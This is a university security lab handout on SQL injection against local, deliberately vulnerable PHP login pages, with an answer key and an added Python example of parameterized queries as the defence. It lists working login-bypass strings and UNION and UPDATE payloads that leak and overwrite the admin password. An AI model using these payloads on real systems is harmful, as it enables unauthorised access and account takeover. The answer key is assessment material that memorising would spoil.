SQL Injections

ECE 4112 Internetwork Security

Group number: _________________
Group members: ___________________________ ___________________________

Goal: The goal of this lab is to understand how SQL injections work, and the defenses against them.

Summary: In this lab you will install the programs necessary to run an HTTP server using PHP and MySQL. You will then exploit the web pages given to you, using SQL injections.

Background and Theory: A SQL injection occurs when user input containing SQL syntax is pasted directly into the text of a query. If the input is not validated (or the query is not parameterized), the attacker's fragment is executed as part of the application's own query. This vulnerability is common among amateur sites. It allows an attacker to log in as a privileged user without knowing the password, read data the page never meant to expose, and edit or outright delete database entries.

Prelab Questions: None.

Lab Scenario: This lab uses web server programs run on your Windows XP virtual machine. WAMP5 provides the web server (Apache), the SQL server (MySQL), and PHP.

Section 1: Setup and Basic Injections

First we will install WAMP. This is an integrated package for Windows containing Apache, MySQL, and PHP.

Copy wamp5_1.5.0c.exe from your CD into your tools folder.
Run wamp5_1.5.0c.exe.
Click Next.
Click I accept the agreement.
Click Next 4 times.
Click Install.
Click Ok.
Click Open.
Click Yes.
Click Finish.

Now you have Apache, MySQL, and PHP all running on your Windows virtual machine.

Copy login.sql from the CD to your tools folder.
Left click on the WAMP system tray icon (the speedometer). Choose MySQL, then choose MySQL console.
The console prompts for a password. The default root password is blank, so just hit Enter. Then load the lab database at the mysql> prompt:

    mysql> source <full path to login.sql>;

replacing <full path to login.sql> with the full path of the folder you copied login.sql into.

Copy login.php, admin.php, user.php, and guest.php into c:\wamp\www.
Open up your browser and go to the page http://localhost/login.php
There are 3 users: admin, user, and guest. Try to log in to each user.

Q1.1: What happened when you tried to log in to each user?

Often the source code of a site is not available to an attacker, so some information gathering must be done first. One way is to simply try different kinds of injections and see which ones succeed; the strings that work tell you how the application quotes its values and which comment syntax the database accepts. Here are some common injection strings:

    ' or 'x'='x
    ') or ('x'='x
    ' or 1=1--
    " or 1=1--
    or 1=1--
    " or 0=0 --
    or 0=0 --
    ' or 0=0 #
    " or 0=0 #
    ' or a=a--
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 --
    hi' or 1=1 --
    hi") or ("a"="a

Try putting these into the username field and logging in. Note: it is important that you put a space at the end of each string, for example ' or 'x'='x followed by a space. (MySQL only treats -- as the start of a comment when it is followed by whitespace, so the strings ending in -- depend on that trailing space to comment out the rest of the query.)

Find an injection which, when put into the username field, will let you log in.

Q1.2: Which injection string allowed you to log in?
Q1.3: What kind of user did you log in as?

Now we are going to try to log in as admin. Put admin in the username field, and injection strings into the password field.

Q1.4: Which injection string allowed you to log in as admin?

Section 2: Retrieving and Editing Data

Log in as guest. The guest page has a feature where you can look up a username and get their real name. We are going to use this feature to get the password of the admin. In the text box type:

    " UNION SELECT password FROM logintable WHERE username="admin" -- 

Note: make sure to include an extra space at the end of the input. Click on Submit.

Q2.1: What is the password of the admin?
Q2.2: What is the password of the user?

Log in as user. The user page has a feature where you can change your password. We are going to use this feature to change the password of the admin. In the text box type:

    password" WHERE username="admin" -- 

Note: make sure to include an extra space at the end of the input. Click on Submit.
The admin's password has now been changed to password. Go back to the login page and try to log in as admin using the new password.

Q2.3: Were you able to log in as the admin with the password "password"?

Answer Sheet

Group Number: _______________
Member Names: _________________________ _________________________

Section 1: Setup and Basic Injections
Q1.1: What happened when you tried to log in to each user?
Q1.2: Which injection string allowed you to log in?
Q1.3: What kind of user did you log in as?
Q1.4: Which injection string allowed you to log in as admin?

Section 2: Retrieving and Editing Data
Q2.1: What is the password of the admin?
Q2.2: What is the password of the user?
Q2.3: Were you able to log in as the admin with the password "password"?

Suggested Additions and Future Enhancements:

Answer Key

Section 1: Setup and Basic Injections
Q1.1: What happened when you tried to log in to each user?
If you don't enter a password, admin and user will fail, but you will be able to log in as guest.
Q1.2: Which injection string allowed you to log in?
Any one of the following is sufficient; all of them work:
    " or 1=1--
    " or 0=0 --
    " or 0=0 #
Q1.3: What kind of user did you log in as?
guest
Q1.4: Which injection string allowed you to log in as admin?
Any one of the following is sufficient; all of them work:
    " or 1=1--
    " or 0=0 --
    " or 0=0 #
    hi" or "a"="a
    hi" or 1=1 --

Section 2: Retrieving and Editing Data
Q2.1: What is the password of the admin?
secure
Q2.2: What is the password of the user?
password
Q2.3: Were you able to log in as the admin with the password "password"?
yes
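Worked example (added here; this is not code from the lab handout or from its PHP pages): the three queries that Sections 1 and 2 attack, rebuilt in Python against an in-memory SQLite table, each next to a parameterized version that the same input cannot alter. Judging by which strings succeed, the lab's pages build their queries with double-quoted string literals; SQLite reads a double-quoted token as a column name first, so this example uses the single-quote form of the same strings (' or 1=1--, hi' or 1=1 --, and the UNION and UPDATE payloads with ' in place of "), and SQLite does not need the trailing space that MySQL's -- comment requires. The table name logintable is the lab's; the column names username, password and realname, the real-name values, and the choice to return every row a query matches (the lab's pages decide which of those rows to log in as) are assumptions of this example.

```python
# Added example (not part of the lab handout): the injectable queries from
# Sections 1 and 2 recreated against SQLite, beside parameterized versions.
import sqlite3

# Constructed seed data. Account names come from the lab and the passwords
# are the ones the answer key reveals; the real names are made up here.
SEED_ROWS = [
    ("admin", "secure", "Site Administrator"),
    ("user", "password", "Regular User"),
    ("guest", "", "Guest Account"),
]


def fresh_db():
    """Stand-in for the lab's logintable (column names are assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE logintable (username TEXT, password TEXT, realname TEXT)")
    db.executemany("INSERT INTO logintable VALUES (?, ?, ?)", SEED_ROWS)
    return db


# --- Vulnerable queries: the input is glued into the SQL text, which is what
# the lab's pages must be doing for the injection strings to work at all.

def vulnerable_login(db, username, password):
    """Every username the WHERE clause matches; the page picks one to log in as."""
    sql = ("SELECT username FROM logintable WHERE username='" + username +
           "' AND password='" + password + "'")
    return [r[0] for r in db.execute(sql).fetchall()]


def vulnerable_lookup(db, username):
    """The guest page's real-name lookup: returns every row the query yields."""
    sql = "SELECT realname FROM logintable WHERE username='" + username + "'"
    return [r[0] for r in db.execute(sql).fetchall()]


def vulnerable_change_password(db, current_user, new_password):
    """The user page's password change; returns how many rows were updated."""
    sql = ("UPDATE logintable SET password='" + new_password +
           "' WHERE username='" + current_user + "'")
    return db.execute(sql).rowcount


# --- Parameterized queries: values travel separately from the SQL text, so
# quotes and -- inside the input are data to the parser, never syntax.

def safe_login(db, username, password):
    sql = "SELECT username FROM logintable WHERE username=? AND password=?"
    return [r[0] for r in db.execute(sql, (username, password)).fetchall()]


def safe_lookup(db, username):
    sql = "SELECT realname FROM logintable WHERE username=?"
    return [r[0] for r in db.execute(sql, (username,)).fetchall()]


def safe_change_password(db, current_user, new_password):
    sql = "UPDATE logintable SET password=? WHERE username=?"
    return db.execute(sql, (new_password, current_user)).rowcount


def run_lab():
    """Replays Sections 1 and 2 against both versions and returns the outcomes."""
    db = fresh_db()
    out = {}
    # Section 1: ' or 1=1-- turns the WHERE clause into (nothing) OR true and
    # comments out the password check, so every account matches.
    out["bypass"] = vulnerable_login(db, "' or 1=1--", "")
    # Section 1, Q1.4: the same trick in the password field with admin typed
    # as the username; admin is among the rows returned.
    out["admin_bypass"] = vulnerable_login(db, "admin", "hi' or 1=1 --")
    # Section 2, Q2.1: UNION appends a second SELECT whose single column is
    # displayed where the real name would have been.
    out["leak"] = vulnerable_lookup(
        db, "' UNION SELECT password FROM logintable WHERE username='admin' -- ")
    # Section 2: closing the literal early lets the input supply its own WHERE
    # clause, so the UPDATE hits admin instead of the logged-in user.
    out["hijack_rows"] = vulnerable_change_password(
        db, "user", "password' WHERE username='admin' -- ")
    out["admin_after"] = vulnerable_login(db, "admin", "password")
    # The same inputs against the parameterized versions, on a fresh table.
    db = fresh_db()
    out["safe_bypass"] = safe_login(db, "' or 1=1--", "")
    out["safe_leak"] = safe_lookup(
        db, "' UNION SELECT password FROM logintable WHERE username='admin' -- ")
    safe_change_password(db, "user", "password' WHERE username='admin' -- ")
    out["safe_admin_after"] = safe_login(db, "admin", "secure")
    return out


if __name__ == "__main__":
    for key, value in run_lab().items():
        print(key, "->", value)
```

Run it directly to print each outcome. The parameterized calls return nothing for the bypass and UNION strings, and the parameterized password change stores the attacker's whole string as user's literal password while admin's stays secure. That is the defense the lab's goal refers to: the driver binds the values, so the input can never reach the SQL parser as syntax; in PHP this means mysqli or PDO prepared statements with bound parameters rather than string concatenation.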